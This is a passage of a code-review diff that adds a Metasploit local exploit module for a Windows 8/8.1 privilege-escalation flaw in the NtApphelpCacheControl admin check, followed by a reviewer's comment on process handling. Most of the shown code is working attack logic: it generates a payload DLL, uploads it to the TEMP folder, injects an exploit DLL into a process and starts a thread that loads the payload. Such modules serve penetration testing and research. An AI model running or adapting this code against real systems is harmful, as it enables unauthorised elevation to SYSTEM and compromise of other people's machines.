modules/exploits/windows/local/ntapphelpcachecontrol.rb

```diff
@@ -0,0 +1,147 @@
+        operation is restricted to administrators. This is checked in the function
+        AhcVerifyAdminContext.
+
+        This function has a vulnerability where it doesn't correctly check the impersonation token
+        of the caller to determine if the user is an administrator. It reads the caller's
+        impersonation token using PsReferenceImpersonationToken and then does a comparison between
+        the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level
+        of the token so it's possible to get an identify token on your thread from a local system
+        process and bypass this check.
+
+        This module currently only affects Windows 8 and Windows 8.1, and requires access to
+        C:\Windows\System\ComputerDefaults.exe (although this can be improved).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'James Forshaw',
+          'sinn3r'
+        ],
+      'Platform'       => 'win',
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Arch'           => [ARCH_X86],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'        =>
+        [
+          [ 'Windows 8 / Windows 8.1 (x86 and x64)', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'Payload'        =>
+        {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'     =>
+        [
+          [ 'OSVEB', '116497' ],
+          [ 'EDB', '35661' ],
+          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=118']
+        ],
+      'DisclosureDate' => 'Sep 30 2014'
+    }))
+  end
+
+  def temp
+    @temp ||= get_env('TEMP').to_s
+  end
+
+  def payload_filepath
+    @payload_filepath ||= "#{temp}\\#{Rex::Text.rand_text_alpha(6)}.dll"
+  end
+
+  def upload_payload_dll(payload_filepath)
+    payload = generate_payload_dll({:dll_exitprocess => true})
+    begin
+      write_file(payload_filepath, payload)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      fail_with(
+          Failure::Unknown,
+          "Error uploading file #{payload_filepath}: #{e.class} #{e}"
+      )
+    end
+  end
+
+  def upload_payload
+    print_status("Payload DLL will be: #{payload_filepath}")
+
+    # Upload the payload
+    upload_payload_dll(payload_filepath)
+    if !file?(payload_filepath)
+      fail_with(Failure::Unknown, "Failed to save the payload DLL, or got removed. No idea why.")
+    end
+  end
+
+  def inject_exploit(process)
+    lib_file_path = ::File.join(
+      Msf::Config.data_directory, "exploits", "ntapphelpcachecontrol", 'exploit.dll'
+    )
+
+    print_status("Creating thread")
+    exploit_mem, offset = inject_dll_into_process(process, lib_file_path)
+    var_mem = inject_into_process(process, payload_filepath)
+    process.thread.create(exploit_mem + offset, var_mem)
+  end
+
+  def prep_exploit_host
```

Comment:
wait, no... I don't wait cmd_exec_get_pid. It returns a process.pid, and pid is just a cosmetic thing for the module. I actually want the process instance for the injection.